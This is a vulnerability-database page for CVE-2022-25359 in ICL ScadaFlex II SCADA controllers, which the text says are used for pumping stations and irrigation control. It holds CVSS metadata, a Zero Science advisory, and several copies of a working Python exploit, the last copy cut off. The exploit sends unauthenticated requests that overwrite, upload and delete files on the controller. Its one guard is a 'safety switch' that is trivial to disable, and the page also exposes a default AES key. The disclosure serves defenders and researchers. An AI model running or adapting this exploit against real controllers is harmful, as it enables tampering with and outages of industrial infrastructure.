ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File Modification Exploit

2022-02-22T00:00:00

Description

ICL ScadaFlex II SCADA Controllers SC-1/SC-2 version 1.03.07 is vulnerable to unauthenticated file write/overwrite and deletion. This allows an attacker to execute critical file CRUD operations on the device that can potentially allow system access and impact availability.

{"id": "1337DAY-ID-37413", "vendorId": null, "type": "zdt", "bulletinFamily": "exploit", "title": "ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File Modification Exploit", "description": "ICL ScadaFlex II SCADA Controllers SC-1/SC-2 version 1.03.07 is vulnerable to unauthenticated file write/overwrite and deletion. This allows an attacker to execute critical file CRUD operations on the device that can potentially allow system access and impact availability.", "published": "2022-02-22T00:00:00", "modified": "2022-02-22T00:00:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.4}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.2}, "href": "https://0day.today/exploit/description/37413", "reporter": "LiquidWorm", "references": [], "cvelist": ["CVE-2022-25359"], "immutableFields": [], "lastseen": "2022-03-08T22:03:41", "viewCount": 78, "enchantments": {"backreferences": {"references": [{"type": "cve", "idList": ["CVE-2022-25359"]}, {"type": "exploitdb", "idList": ["EDB-ID:50783"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:166103"]}, {"type": "zeroscience", "idList": ["ZSL-2022-5698"]}]}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2022-25359"]}, {"type": "exploitdb", "idList": ["EDB-ID:50783"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:166103"]}, {"type": "zeroscience", "idList": ["ZSL-2022-5698"]}], "rev": 4}, "score": {"value": 0.8, "vector": "NONE"}, "vulnersScore": 0.8}, "_state": {"dependencies": 1646919479, "score": 1659855189}, "_internal": {"score_hash": "f02ceddce6fc75c65ceda87d8fb6a309"}, "sourceHref": "https://0day.today/exploit/37413", "sourceData": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n#\n# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD\n#\n#\n# Vendor: Industrial Control Links, Inc.\n# Product web page: http://www.iclinks.com\n# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf\n# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24\n# SW: 1.02.20 (build 286), WebLib: 1.24\n# SW: 1.02.15 (build 286), WebLib: 1.22\n# SW: 1.02.01 (build 229), WebLib: 1.16\n# SW: 1.01.14 (build 172), WebLib: 1.14\n# SW: 1.01.01 (build 2149), WebLib: 1.13\n#\n#\n# Summary: Scadaflex II controllers are 100% web based\n# for both configuration and user interface. No applications\n# are required other than any standard web browser. They\n# are easily supported by remote access over the Internet\n# or a cellular link. Scadaflex II controllers support\n# industry standard wired communications using Modbus,\n# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial\n# bridging for Modbus or any other protocol. Each Scadaflex\n# II controller has both analog and digital, inputs and\n# outputs, sufficient for pumping stations, irrigation\n# controls, and other similar process monitoring and control\n# applications. They can also serve as communications\n# concentrators and protocol converters that enhance the\n# operation of existing PLCs and process equipment.\n#\n# Desc: The SCADA controller is vulnerable to unauthenticated\n# file write/overwrite and delete vulnerability. This allows\n# an attacker to execute critical file CRUD operations on the\n# device that can potentially allow system access and impact\n# availability.\n#\n# Tested on: SCADA HTTP Server\n#\n#\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n# @zeroscience\n#\n#\n# Advisory ID: ZSL-2022-5698\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php\n#\n# CVE ID: CVE-2022-25359\n# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359\n#\n#\n# 06.11.2021\n#\n\nimport time,sys\nimport requests\nimport datetime\nimport showtime\n\n# Default\n# AES Encryption Key = 'ABCD1234abcd:ICL'\n\ndef bann():\n print('''\n----------------------------------------------------------\n ) ) ) ) ) )\n ( ( ( ( ( (\n ) ) ) ) ) )\n (~~~~~~~~~) (~~~~~~~~~)\n | t00t | | w00t |\n | | | |\n I _._ I _._\n I /' `\\\\ I /' `\\\\\n I | M | I | J |\n f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~|\n .' | ||~~~~~~~~| | .' | | |~~~~~~~~| |\n/'______|___||__###___|____|/'_______|____|_|__###___|___|\n\n ScadaFlex II SCADA Controllers\n Remote write/delete PoC\n ZSL-2022-5698\n----------------------------------------------------------\n ''')\n\ndef safe(*trigger, ):\n return True # |-| Safety Switch\n\ndef choice(n):\n try:\n if n == 1:\n overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))\n elif n == 2:\n delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))\n else:\n print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')\n print('Usage (Delete): ./sflex.py [IP] [File position number]')\n raise SystemExit('t00t')\n except Exception as tip:\n raise SystemExit(tip)\n\ndef jump():\n choice(1) if len(sys.argv) == 4 else next\n choice(2) if len(sys.argv) == 3 else next\n\ndef overwrite(controllerip, filepos):\n print('Starting script at', start)\n localfile = sys.argv[2]\n\n with open(localfile, 'rb') as opener:\n scadaurl = 'http://'\n scadaurl += controllerip\n scadaurl += '/d.php?N'\n scadaurl += str(filepos)\n scadaurl += ',73,'\n scadaurl += opener.name\n scadaurl += '~'\n scadaurl += str(int(time.time()))\n\n see = requests.post(scadaurl, files = {'upload' : opener})\n\n if '100' in see.text:\n print('File uploaded in {} directory at position {}.'.format('l', filepos))\n print('URL: http://' +controllerip+ '/l/' +localfile)\n else:\n print(\"- controller webserver error.\")\n exit()\n\ndef delete(controllerip, filepos):\n print('Starting script at', start)\n exit(42) if isinstance(filepos, str) else next\n\n scadaurl = 'http://'\n scadaurl += controllerip\n scadaurl += '/rW12IcL_Dat_N'\n scadaurl += str(filepos)\n scadaurl += ',0=1~'\n scadaurl += str(int(time.time()))\n\n see = requests.get(scadaurl)\n\n check = '\\x72\\x57' #|\n check += '\\x31\\x32' #|\n check += '\\x49\\x63' #|\n check += '\\x4c\\x5f' #|\n check += '\\x44\\x61' #|\n check += '\\x74\\x5f' #|\n check += '\\x4e'# o' #|\n check += str(filepos)#|\n check += '\\x2c\\x30' #|\n check += '\\x09\\x52' #|\n \n if check in see.text:\n print('File at position {} deleted.'.format(filepos))\n else:\n print('- controller webserver error.')\n exit()\n\ndef main():\n if safe(True):\n print('Careful...\\nSafety: ON')\n exit(17)\n else:\n print('Safety: OFF', end = '')\n global start\n start = datetime.datetime.now()\n start = start.strftime('%d.%m.%Y %H:%M:%S')\n bann(), jump(), choice(1959)\n\nif __name__ == \"__main__\":\n main()\n", "category": "web applications", "verified": true}

{"packetstorm": [{"lastseen": "2022-02-22T17:23:08", "description": "", "cvss3": {}, "published": "2022-02-22T00:00:00", "type": "packetstorm", "title": "ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File Modification", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-25359"], "modified": "2022-02-22T00:00:00", "id": "PACKETSTORM:166103", "href": "https://packetstormsecurity.com/files/166103/ICL-ScadaFlex-II-SCADA-Controllers-SC-1-SC-2-1.03.07-Remote-File-Modification.html", "sourceData": "`#!/usr/bin/env python3 \n# -*- coding: utf-8 -*- \n# \n# \n# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD \n# \n# \n# Vendor: Industrial Control Links, Inc. \n# Product web page: http://www.iclinks.com \n# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf \n# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24 \n# SW: 1.02.20 (build 286), WebLib: 1.24 \n# SW: 1.02.15 (build 286), WebLib: 1.22 \n# SW: 1.02.01 (build 229), WebLib: 1.16 \n# SW: 1.01.14 (build 172), WebLib: 1.14 \n# SW: 1.01.01 (build 2149), WebLib: 1.13 \n# \n# \n# Summary: Scadaflex II controllers are 100% web based \n# for both configuration and user interface. No applications \n# are required other than any standard web browser. They \n# are easily supported by remote access over the Internet \n# or a cellular link. Scadaflex II controllers support \n# industry standard wired communications using Modbus, \n# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial \n# bridging for Modbus or any other protocol. Each Scadaflex \n# II controller has both analog and digital, inputs and \n# outputs, sufficient for pumping stations, irrigation \n# controls, and other similar process monitoring and control \n# applications. They can also serve as communications \n# concentrators and protocol converters that enhance the \n# operation of existing PLCs and process equipment. \n# \n# Desc: The SCADA controller is vulnerable to unauthenticated \n# file write/overwrite and delete vulnerability. This allows \n# an attacker to execute critical file CRUD operations on the \n# device that can potentially allow system access and impact \n# availability. \n# \n# Tested on: SCADA HTTP Server \n# \n# \n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic \n# @zeroscience \n# \n# \n# Advisory ID: ZSL-2022-5698 \n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php \n# \n# CVE ID: CVE-2022-25359 \n# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359 \n# \n# \n# 06.11.2021 \n# \n \nimport time,sys \nimport requests \nimport datetime \nimport showtime \n \n# Default \n# AES Encryption Key = 'ABCD1234abcd:ICL' \n \ndef bann(): \nprint(''' \n---------------------------------------------------------- \n) ) ) ) ) ) \n( ( ( ( ( ( \n) ) ) ) ) ) \n(~~~~~~~~~) (~~~~~~~~~) \n| t00t | | w00t | \n| | | | \nI _._ I _._ \nI /' `\\\\ I /' `\\\\ \nI | M | I | J | \nf | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~| \n.' | ||~~~~~~~~| | .' | | |~~~~~~~~| | \n/'______|___||__###___|____|/'_______|____|_|__###___|___| \n \nScadaFlex II SCADA Controllers \nRemote write/delete PoC \nZSL-2022-5698 \n---------------------------------------------------------- \n''') \n \ndef safe(*trigger, ): \nreturn True # |-| Safety Switch \n \ndef choice(n): \ntry: \nif n == 1: \noverwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10)) \nelif n == 2: \ndelete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10)) \nelse: \nprint('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]') \nprint('Usage (Delete): ./sflex.py [IP] [File position number]') \nraise SystemExit('t00t') \nexcept Exception as tip: \nraise SystemExit(tip) \n \ndef jump(): \nchoice(1) if len(sys.argv) == 4 else next \nchoice(2) if len(sys.argv) == 3 else next \n \ndef overwrite(controllerip, filepos): \nprint('Starting script at', start) \nlocalfile = sys.argv[2] \n \nwith open(localfile, 'rb') as opener: \nscadaurl = 'http://' \nscadaurl += controllerip \nscadaurl += '/d.php?N' \nscadaurl += str(filepos) \nscadaurl += ',73,' \nscadaurl += opener.name \nscadaurl += '~' \nscadaurl += str(int(time.time())) \n \nsee = requests.post(scadaurl, files = {'upload' : opener}) \n \nif '100' in see.text: \nprint('File uploaded in {} directory at position {}.'.format('l', filepos)) \nprint('URL: http://' +controllerip+ '/l/' +localfile) \nelse: \nprint(\"- controller webserver error.\") \nexit() \n \ndef delete(controllerip, filepos): \nprint('Starting script at', start) \nexit(42) if isinstance(filepos, str) else next \n \nscadaurl = 'http://' \nscadaurl += controllerip \nscadaurl += '/rW12IcL_Dat_N' \nscadaurl += str(filepos) \nscadaurl += ',0=1~' \nscadaurl += str(int(time.time())) \n \nsee = requests.get(scadaurl) \n \ncheck = '\\x72\\x57' #| \ncheck += '\\x31\\x32' #| \ncheck += '\\x49\\x63' #| \ncheck += '\\x4c\\x5f' #| \ncheck += '\\x44\\x61' #| \ncheck += '\\x74\\x5f' #| \ncheck += '\\x4e'# o' #| \ncheck += str(filepos)#| \ncheck += '\\x2c\\x30' #| \ncheck += '\\x09\\x52' #| \n \nif check in see.text: \nprint('File at position {} deleted.'.format(filepos)) \nelse: \nprint('- controller webserver error.') \nexit() \n \ndef main(): \nif safe(True): \nprint('Careful...\\nSafety: ON') \nexit(17) \nelse: \nprint('Safety: OFF', end = '') \nglobal start \nstart = datetime.datetime.now() \nstart = start.strftime('%d.%m.%Y %H:%M:%S') \nbann(), jump(), choice(1959) \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/166103/ZSL-2022-5698.txt"}], "cve": [{"lastseen": "2022-03-23T10:28:39", "description": "On ICL ScadaFlex II SCADA Controller SC-1 and SC-2 1.03.07 devices, unauthenticated remote attackers can overwrite, delete, or create files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-02-26T05:15:00", "type": "cve", "title": "CVE-2022-25359", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-25359"], "modified": "2022-03-08T17:46:00", "cpe": ["cpe:/o:iclinks:scadaflex_ii_firmware:1.03.07", "cpe:/o:iclinks:scadaflex_ii_firmware:1.02.20", "cpe:/o:iclinks:weblib:1.16", "cpe:/o:iclinks:weblib:1.24", "cpe:/o:iclinks:weblib:1.13", "cpe:/o:iclinks:scadaflex_ii_firmware:1.02.15", "cpe:/o:iclinks:weblib:1.14", "cpe:/o:iclinks:scadaflex_ii_firmware:1.01.14", "cpe:/o:iclinks:weblib:1.22", "cpe:/o:iclinks:scadaflex_ii_firmware:1.01.01", "cpe:/o:iclinks:scadaflex_ii_firmware:1.02.01"], "id": "CVE-2022-25359", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25359", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.03.07:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:weblib:1.13:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.02.01:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:weblib:1.24:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.02.15:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.02.20:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:weblib:1.22:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:weblib:1.16:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.01.01:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:weblib:1.14:*:*:*:*:*:*:*", "cpe:2.3:o:iclinks:scadaflex_ii_firmware:1.01.14:*:*:*:*:*:*:*"]}], "zeroscience": [{"lastseen": "2022-03-08T22:29:34", "description": "Title: ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD \nAdvisory ID: [ZSL-2022-5698](<ZSL-2022-5698.php>) \nType: Local/Remote \nImpact: System Access, DoS, Cross-Site Scripting, Manipulation of Data \nRisk: (4/5) \nRelease Date: 22.02.2022 \n\n\n##### Summary\n\nScadaflex II controllers are 100% web based for both configuration and user interface. No applications are required other than any standard web browser. They are easily supported by remote access over the Internet or a cellular link. Scadaflex II controllers support industry standard wired communications using Modbus, DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial bridging for Modbus or any other protocol. Each Scadaflex II controller has both analog and digital, inputs and outputs, sufficient for pumping stations, irrigation controls, and other similar process monitoring and control applications. They can also serve as communications concentrators and protocol converters that enhance the operation of existing PLCs and process equipment. \n\n##### Description\n\nThe SCADA controller is vulnerable to unauthenticated file write/overwrite and delete vulnerability. This allows an attacker to execute critical file CRUD operations on the device that can potentially allow system access and impact availability. \n\n##### Vendor\n\nIndustrial Control Links, Inc. - <http://www.iclinks.com>\n\n##### Affected Version\n\nSW: 1.03.07 (build 317), WebLib: 1.24 \nSW: 1.02.20 (build 286), WebLib: 1.24 \nSW: 1.02.15 (build 286), WebLib: 1.22 \nSW: 1.02.01 (build 229), WebLib: 1.16 \nSW: 1.01.14 (build 172), WebLib: 1.14 \nSW: 1.01.01 (build 2149), WebLib: 1.13 \n\n##### Tested On\n\nSCADA HTTP Server \n\n##### Vendor Status\n\n[06.11.2021] Vulnerability discovered. \n[16.01.2022] Vendor contacted. \n[21.02.2022] No response from the vendor. \n[22.02.2022] Public security advisory released. \n\n##### PoC\n\n[sflex.py](<../../codes/sflex.txt>)\n\n##### Credits\n\nVulnerability discovered by Gjoko Krstic - <[gjoko@zeroscience.mk](<mailto:gjoko@zeroscience.mk>)>\n\n##### References\n\n[1] <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359> \n[2] <https://nvd.nist.gov/vuln/detail/CVE-2022-25359> \n[3] <https://packetstormsecurity.com/files/166103> \n[4] <https://cxsecurity.com/issue/WLB-2022020117> \n[5] <https://exchange.xforce.ibmcloud.com/vulnerabilities/220156> \n[6] <https://vulners.com/zeroscience/ZSL-2022-5698> \n[7] <https://www.exploit-db.com/exploits/50783> \n[8] <https://www.cisa.gov/uscert/ncas/bulletins/sb22-059>\n\n##### Changelog\n\n[22.02.2022] - Initial release \n[23.02.2022] - Added reference [5], [6] and [7] \n[05.03.2022] - Added reference [8] \n\n##### Contact\n\nZero Science Lab \n \nWeb: <https://www.zeroscience.mk> \ne-mail: [lab@zeroscience.mk](<mailto:lab@zeroscience.mk>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-02-22T00:00:00", "type": "zeroscience", "title": "ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-25359"], "modified": "2022-02-22T00:00:00", "id": "ZSL-2022-5698", "href": "http://zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php", "sourceData": "<html><body><p>#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n#\r\n#\r\n# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD\r\n#\r\n#\r\n# Vendor: Industrial Control Links, Inc.\r\n# Product web page: http://www.iclinks.com\r\n# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf\r\n# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24\r\n# SW: 1.02.20 (build 286), WebLib: 1.24\r\n# SW: 1.02.15 (build 286), WebLib: 1.22\r\n# SW: 1.02.01 (build 229), WebLib: 1.16\r\n# SW: 1.01.14 (build 172), WebLib: 1.14\r\n# SW: 1.01.01 (build 2149), WebLib: 1.13\r\n#\r\n#\r\n# Summary: Scadaflex II controllers are 100% web based\r\n# for both configuration and user interface. No applications\r\n# are required other than any standard web browser. They\r\n# are easily supported by remote access over the Internet\r\n# or a cellular link. Scadaflex II controllers support\r\n# industry standard wired communications using Modbus,\r\n# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial\r\n# bridging for Modbus or any other protocol. Each Scadaflex\r\n# II controller has both analog and digital, inputs and\r\n# outputs, sufficient for pumping stations, irrigation\r\n# controls, and other similar process monitoring and control\r\n# applications. They can also serve as communications\r\n# concentrators and protocol converters that enhance the\r\n# operation of existing PLCs and process equipment.\r\n#\r\n# Desc: The SCADA controller is vulnerable to unauthenticated\r\n# file write/overwrite and delete vulnerability. This allows\r\n# an attacker to execute critical file CRUD operations on the\r\n# device that can potentially allow system access and impact\r\n# availability.\r\n#\r\n# Tested on: SCADA HTTP Server\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\r\n# @zeroscience\r\n#\r\n#\r\n# Advisory ID: ZSL-2022-5698\r\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php\r\n#\r\n# CVE ID: CVE-2022-25359\r\n# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359\r\n#\r\n#\r\n# 06.11.2021\r\n#\r\n\r\nimport time,sys\r\nimport requests\r\nimport datetime\r\nimport showtime\r\n\r\n# Default\r\n# AES Encryption Key = 'ABCD1234abcd:ICL'\r\n\r\ndef bann():\r\n print('''\r\n----------------------------------------------------------\r\n ) ) ) ) ) )\r\n ( ( ( ( ( (\r\n ) ) ) ) ) )\r\n (~~~~~~~~~) (~~~~~~~~~)\r\n | t00t | | w00t |\r\n | | | |\r\n I _._ I _._\r\n I /' `\\\\ I /' `\\\\\r\n I | M | I | J |\r\n f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~|\r\n .' | ||~~~~~~~~| | .' | | |~~~~~~~~| |\r\n/'______|___||__###___|____|/'_______|____|_|__###___|___|\r\n\r\n ScadaFlex II SCADA Controllers\r\n Remote write/delete PoC\r\n ZSL-2022-5698\r\n----------------------------------------------------------\r\n ''')\r\n\r\ndef safe(*trigger, ):\r\n return True # |-| Safety Switch\r\n\r\ndef choice(n):\r\n try:\r\n if n == 1:\r\n overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))\r\n elif n == 2:\r\n delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))\r\n else:\r\n print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')\r\n print('Usage (Delete): ./sflex.py [IP] [File position number]')\r\n raise SystemExit('t00t')\r\n except Exception as tip:\r\n raise SystemExit(tip)\r\n\r\ndef jump():\r\n choice(1) if len(sys.argv) == 4 else next\r\n choice(2) if len(sys.argv) == 3 else next\r\n\r\ndef overwrite(controllerip, filepos):\r\n print('Starting script at', start)\r\n localfile = sys.argv[2]\r\n\r\n with open(localfile, 'rb') as opener:\r\n scadaurl = 'http://'\r\n scadaurl += controllerip\r\n scadaurl += '/d.php?N'\r\n scadaurl += str(filepos)\r\n scadaurl += ',73,'\r\n scadaurl += opener.name\r\n scadaurl += '~'\r\n scadaurl += str(int(time.time()))\r\n\r\n see = requests.post(scadaurl, files = {'upload' : opener})\r\n\r\n if '100' in see.text:\r\n print('File uploaded in {} directory at position {}.'.format('l', filepos))\r\n print('URL: http://' +controllerip+ '/l/' +localfile)\r\n else:\r\n print(\"- controller webserver error.\")\r\n exit()\r\n\r\ndef delete(controllerip, filepos):\r\n print('Starting script at', start)\r\n exit(42) if isinstance(filepos, str) else next\r\n\r\n scadaurl = 'http://'\r\n scadaurl += controllerip\r\n scadaurl += '/rW12IcL_Dat_N'\r\n scadaurl += str(filepos)\r\n scadaurl += ',0=1~'\r\n scadaurl += str(int(time.time()))\r\n\r\n see = requests.get(scadaurl)\r\n\r\n check = '\\x72\\x57' #|\r\n check += '\\x31\\x32' #|\r\n check += '\\x49\\x63' #|\r\n check += '\\x4c\\x5f' #|\r\n check += '\\x44\\x61' #|\r\n check += '\\x74\\x5f' #|\r\n check += '\\x4e'# o' #|\r\n check += str(filepos)#|\r\n check += '\\x2c\\x30' #|\r\n check += '\\x09\\x52' #|\r\n \r\n if check in see.text:\r\n print('File at position {} deleted.'.format(filepos))\r\n else:\r\n \tprint('- controller webserver error.')\r\n exit()\r\n\r\ndef main():\r\n if safe(True):\r\n print('Careful...\\nSafety: ON')\r\n exit(17)\r\n else:\r\n print('Safety: OFF', end = '')\r\n global start\r\n start = datetime.datetime.now()\r\n start = start.strftime('%d.%m.%Y %H:%M:%S')\r\n bann(), jump(), choice(1959)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n</p></body></html>", "sourceHref": "http://zeroscience.mk/codes/sflex.txt", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-11T20:08:29", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-02-23T00:00:00", "type": "exploitdb", "title": "ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-25359", "CVE-2022-25359"], "modified": "2022-02-23T00:00:00", "id": "EDB-ID:50783", "href": "https://www.exploit-db.com/exploits/50783", "sourceData": "# Exploit Title: CL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD\r\n# Exploit Author: LiquidWorm\r\n\r\n#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n#\r\n#\r\n# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD\r\n#\r\n#\r\n# Vendor: Industrial Control Links, Inc.\r\n# Product web page: http://www.iclinks.com\r\n# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf\r\n# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24\r\n# SW: 1.02.20 (build 286), WebLib: 1.24\r\n# SW: 1.02.15 (build 286), WebLib: 1.22\r\n# SW: 1.02.01 (build 229), WebLib: 1.16\r\n# SW: 1.01.14 (build 172), WebLib: 1.14\r\n# SW: 1.01.01 (build 2149), WebLib: 1.13\r\n#\r\n#\r\n# Summary: Scadaflex II controllers are 100% web based\r\n# for both configuration and user interface. No applications\r\n# are required other than any standard web browser. They\r\n# are easily supported by remote access over the Internet\r\n# or a cellular link. Scadaflex II controllers support\r\n# industry standard wired communications using Modbus,\r\n# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial\r\n# bridging for Modbus or any other protocol. Each Scadaflex\r\n# II controller has both analog and digital, inputs and\r\n# outputs, sufficient for pumping stations, irrigation\r\n# controls, and other similar process monitoring and control\r\n# applications. They can also serve as communications\r\n# concentrators and protocol converters that enhance the\r\n# operation of existing PLCs and process equipment.\r\n#\r\n# Desc: The SCADA controller is vulnerable to unauthenticated\r\n# file write/overwrite and delete vulnerability. This allows\r\n# an attacker to execute critical file CRUD operations on the\r\n# device that can potentially allow system access and impact\r\n# availability.\r\n#\r\n# Tested on: SCADA HTTP Server\r\n#\r\n#\r\n# Vulnerability discovered by Gjoko 'LiquidWorm' 